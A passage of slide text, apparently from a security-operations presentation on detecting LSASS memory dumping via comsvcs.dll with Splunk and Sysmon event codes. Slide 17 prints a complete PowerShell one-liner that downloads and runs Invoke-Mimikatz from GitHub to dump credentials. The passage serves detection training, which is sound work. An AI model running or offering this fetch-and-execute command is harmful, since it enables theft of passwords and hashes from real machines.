  • 14. Result from Splunk; SPL Command : index=* source="WinEventLog:Microsoft-Windows-Sysmon/Operational" comsvcs.dll | table RuleName, EventCode, TaskCategory, Image, ImageLoaded, SourceImage, TargetImage, CommandLine Note; -For this method, in Splunk we are looking for the detection related to comsvcs.dll. -We are able to detect 3 important eventcode associated with comsvc.dll -EventCode 1, 7 and 10. 1=Process Create, detect execution of Windows Rundll32.exe 7=ImageLoaed, which is Windows Rundll32 called comsvcs.dll (To execute MiniDump function) 10=Process Access, to detect process accessing to lsass.exe
  • 16. How attacker extract password from dump file?  Using Mimikatz  After creating a dump file of lsass.exe process, attacker can use Mimikatz to extract passwords hashes  Either attacker download mimikatz to victim's pc & execute or attacker can upload the generated dump file to their pc for offline crack hashes.
  • 17. How?  Command - IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMa fia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invok e-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

Hinweis der Redaktion

  1. Add Another point under Achievement : from soc analysis perspective Impact of Privilege Escalation
  2. Add Another point under Achievement : from soc analysis perspective Impact of Privilege Escalation
  3. Add Another point under Achievement : from soc analysis perspective Impact of Privilege Escalation
  4. Add Another point under Achievement : from soc analysis perspective Impact of Privilege Escalation